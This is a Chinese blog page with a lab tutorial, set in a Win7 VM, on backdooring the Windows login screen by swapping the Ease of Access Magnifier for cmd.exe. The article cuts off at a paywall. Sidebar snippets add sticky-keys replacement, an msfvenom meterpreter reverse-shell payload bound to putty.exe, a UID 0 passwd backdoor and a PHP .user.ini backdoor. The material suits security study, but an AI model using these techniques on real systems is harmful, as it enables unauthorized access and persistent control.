利用 “轻松访问” 轻松创建Windows后门

最新推荐文章于 2023-09-25 15:09:22 发布
最新推荐文章于 2023-09-25 15:09:22 发布
阅读量3.9k 收藏 13
点赞数
分类专栏: Windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38684504/article/details/88107548
版权
本文介绍了如何利用Windows系统中的'轻松访问'功能创建后门。通过替换轻松访问中的放大镜程序为cmd.exe,可以在不登录的情况下以管理员权限打开命令提示符,实现对计算机的控制。实验过程包括命令行模式和图像化方式,详细步骤包括更改文件权限、重命名文件以及创建新用户等,以此来创建并测试后门的效果。
摘要由CSDN通过智能技术生成

1. 实验概述

(1)实验环境:

win7虚拟机;

(2)实验描述:

打开win7虚拟机就可以看到左下角有个轻松访问的标志 ,这里面有六个应用,分别是讲述人,放大镜,高对比度,屏幕键盘,粘滞键,筛选键。这六个应用在不用登录电脑账号和密码的情况下就可以直接使用。这个设计是为了让计算机更方便使用。但是在方便使用的时候,也容易被别人留个后门;如果说这六个应用中的一个被别人暗中替换掉了,那就可以实现在不知道账户和密码的情况下,对电脑进行相应的操作。在本次实验中,将给大家简单介绍一下怎么利用“轻松访问”轻松的创建Windows后门;

(3)实验原理:

利用win7登录账户界面中的 “轻松访问” 中的 程序 (本次实验是放大镜),把它替换为cmd.exe程序,实现在不登录的情况下打开cmd命令提示符(系统管理员权限),并进行一些操作,在计算机上留个后门。

2. 实验过程

方式一:命令行的模式(脚本)写后门

(1)登录账户之前,有个轻松访问,左下角标识

(2)我们的实验就是通过这里的轻松访问设置后门(本次实验是在放大镜上设置后门(将放大镜——>变为cmd命令行));

(3)打开记事本,输入如下的命令(蓝色字体):

切换目录到c:\windows\system32;

cd c:\windows\system32

更改文件名为magnify.exe的所有者为当前用户ÿ

最低0.47元/天 解锁文章
橘子女侠
关注
专栏目录
Windows——利用"轻松访问"创建Windows后门
浅浅的博客
02-25 1593
实验环境:虚拟机Win7 概要:当我们每次开启电脑时,都会出现如下界面,点击下图左下角所示的图标——,就会出现 "轻松访问" 的对话框,勾选对话框上任意复选框,系统就会执行其相应的功能!注意,重点来了,这样是不是就意味着,只要我们将 'cmd' 应用程序重命名为 "轻松访问" 选项中任一程序(比如:朗读屏幕内容(讲述人),程序名为Narrator) 的名字,在我们勾选 "讲述人" 复选框并执行...
Windows中IPC$服务及利用
2ed
11-13 4477
IPC$(Internet Process Connection) 共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。 在WindowsXP windows7等系统中,隐藏着一种据说是可以“致命”的漏洞,它让很多人一听到就谈“虎”色变。在“我的电脑”上右击“管理”,依次...
Win10小技巧:如何将在此处打开命令改为CMD或Powershell?
12-04 1993
微软的CMD也就是命令提示符已经伴随了我们很多年了,这些年来CMD已经勤勤恳恳地默默工作着,虽然没有图形化的界面,但是其干净整洁的操作环境仍然受到了大家的欢迎。 随着微软Win10系统的流行,更加强大的PowerShell崭露头角,采用.net架构编写的Powershell性能更加强大,实现的功能也丰富。此时略显老迈的CMD心有力而力不足。而微软也尝试使用各种方法使PowerShell取代目
如何创建后门
weixin_34038293的博客
03-21 682
作 者: zer9 (zer9) 1999.05.03前言:本文之内容可以任意拷贝,传阅。在不违背作者原始 意图的情况下也可任意修改,但请在修改后mail给作 者一份。谢谢!---参考文献:Article: backdoor from The Infinity Concept Issue IISrc: b4b0.c by b4b0Src: daemonsh.pl ...
metasploit---创建后门
孤的博客
11-22 820
后门技术来维持对被攻击系统的访问后门可帮助攻击者维持系统访问,并使攻击者无须重复地实施攻击就能随意使用被攻击系统。后门就是就是绕过正常的计算机机制,获取计算机访问权限的方法。 常见EXE后门 metasploit提供了三个辅助工具来创建payload后门,分别是msfpayload、msfencode以及msfvenom,不过现在只有msfvenom(里面集成了msfpayload和msfenc...
创建linux/unix后门方法总结
weixin_34391445的博客
07-21 202
初级篇   最简单的方法,就是在口令文件 passwd 中增加一个 UID 为 0 的帐号。但最好别这么做,因为只要系统管理员检查口令文件就会“漏馅”了。以下是在 /etc/passwd 口令文件中添加一个 UID 0 帐号的C程序。 <++> backdoor/backdoor1.c #include main() { FILE *fd...
6.1 meterpreter创建后门
robacco的博客
07-31 677
1、使用msfvenom捆绑putty.exe程序,生成后门程序bd_putty.exe。该程序与宿主程序具体相同的功能,当运行后门程序的同时,将运行攻击载荷。 msfvenom -a x64 --platform windows -x /opt/putty.exe -k -p windows/x64/meterpreter_reverse_tcp lhost=192.168.57.128 l...
Windows10怎么创建后门
XMWS-IT
09-02 722
今天给大家分享微思讲师-陈老师带来的利用"轻松访问"创建Windows后门。 想要PPT版的小伙伴可以联系客服发给你 欢迎关注微信公众号【厦门微思网络】。www.xmws.cn专业IT认证培训19周年主要课程:思科、华为、红帽、ORACLE、VMware、CISP、PMP等认证培训及考试 ...
xshell5.0版本无后门
09-29
在描述中提到的“无后门”是指软件在设计和开发过程中,没有预留任何秘密的、未公开的访问途径,这通常是为了防止黑客利用这些隐藏通道进行攻击。对于一款处理敏感信息的工具,如XShell,无后门是保证用户隐私和系统...
Metasploit渗透测试:利用社工手段植入后门
# 1. Metasploit渗透测试简介 Metasploit是一款开源的渗透测试框架,最初是由HD Moore在2003年开发的。它是一个集成的工具集,可以帮助安全专业...Metasploit的最大特点是拥有大量的漏洞利用模块,使得渗透测试人员
粘滞键后门
weixin_45682070的博客
12-04 1052
粘滞键指的是电脑使用中的一种快捷键,专为同时按下两个或多个键有困难的人而设计的。粘滞键的主要功能是方便Shift等键的组合使用。 粘滞键可以先按一个键位(如shift),再按另一键位,而不是同时按下两个键位,方便某些因身体原因而无法同时按下多键的人。一般的电脑连按五次shift会出现粘滞键提示。 1:粘滞键位置在C:\Windows\System32\sethc.exe 搜索到sethc.exe,直接删除会提示没权限 2:更改权限: 右键->属性->安全->高级 在所有者中编辑成adm
常用后门方法收集
aod83029的博客
12-07 395
1、通过php.ini或者user.ini留后门 在一个有正常php文件的目录下新建一个.user.ini 内容为auto_prepend_file=xxx.gif(png/jpg)之类 而你的xxx.gif之类就是你的后门2、后门的代码第一行删除自身,然后驻留在后台内存里,等待外部链接<?phpunlink($_SERVER['SCRIPT_FILEN...
简单的cmd双管道后门
qq_42124567的博客
05-16 1033
这几天学习了一下windows后门编程,并尝试着写了一个简单的cmd双管道后门。主要涉及到了socket通信和管道。 后门分为主动连接型和反向连接型,区别就是一个是后门程序作为服务端,另一个是后门程序作为客户端。 双管道的原因:cmd执行结果写入管道1写句柄,后门从管道1读句柄读取cmd执行结果,后门接受到的命令通过管道2的写句柄写入,cmd通过管道2的读句柄读出。 多的不说,直接上代码,我觉得注...
win7提权system与后门
热门推荐
Shanfenglan's blog
11-17 8万+
CATALOG前言操作过程1.利用wlbsctrl.dll提权2.利用TSMSISrv.dll和TSVIPSrv.dll提权3.实现后门查考文章 前言 今天看了一篇文章,发现文章中的利用方法只能在win7上使用,无法在win10上使用,特做记录。 操作过程 1.利用wlbsctrl.dll提权 IKEEXT(IKE and AuthIP IPsec Keying Modules)服务在启动时会加载wlbsctrl.dll,但Windows系统默认配置下该dll不存在,如果我们将自己的dll放在这个位置,在服
Windows创建后门隐藏用户的常见方法
最新发布
SwBack的博客
09-25 1091
文章并没有什么技术含量,纯粹是我正好在做这个事情,同时想到自己之前没有写过,所以特意写一遍记录以下windows 下的后门用户主要分为以下4种。
为自己给操作系统留个后门?我的安全管理经验谈
weixin_33721427的博客
07-02 268
大家可能看到这个题目,以为我是要做坏事,其实坏事的对立面就是好事,根据一些博客论坛的帖子加上自己的一些经验之谈,把具体的一些见解分享给大家,对于复杂一些的给予详细步骤,简单的一笔带过。前提是这台电脑必须是你以前管理的,并且知道administrator权限,权当是技术交流,让51CTO网友了解系统更多的安全设定,以防患于未然。相信你做了以下步骤,总会有人想不...
windows启动时自动运行程序(登录或不登录都可以的)
no problem的博客
10-31 1万+
第一种:需要登录才能运行的方法 第一步:编写运行jar包的bat文件 新建一个run.txt文件,将以下内容放进去,然后修改文件后缀为.bat @echo off java -jar C:\Users\Administrator\Desktop\test-0.0.1-SNAPSHOT.jar > C:\Users\Administrator\Desktop\test.log...
使用Cmder替换cmd,让开发更高效
HELLO WORLD
06-10 2662
一、为什么要更换为cmder 在做项目时,有些时候我想复制控制台上面的代码时,cmd有的时候复制粘贴很麻烦,Cmder则不会,并且Cmder可以分屏多开窗口,可以设置窗口颜色,字体大小,并且很多快捷键和谷歌浏览器操作类似,等等很多功能。 二、官网下载地址 地址:http://cmder.net/ 1、关于下载 进入官网以后,有mini版和完整版,建议完整版,完整版功能更齐全,还可以使用gi...
网络安全实战之植入后门程序
zxcvbnmasdflzl的博客
04-17 394
在 VMware 上建立两个虚拟机:win7 和 kali。Kali:它是 Linux 发行版的操作系统,它拥有超过 300 个渗透测试工具,就不用自己再去找安装包,去安装到我们自己的电脑上了,毕竟自己从网上找到,也不安全。它甚至还集成了 600 多种黑客工具,很强大。可以永久免费使用,基本上学黑客攻击必会用到这个系统。用 ipconfig 进行查询。用 ifconfig 进行查询。①网络安全学习路线②20 份渗透测试电子书③安全攻防 357 页笔记④50 份安全攻防面试指南。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值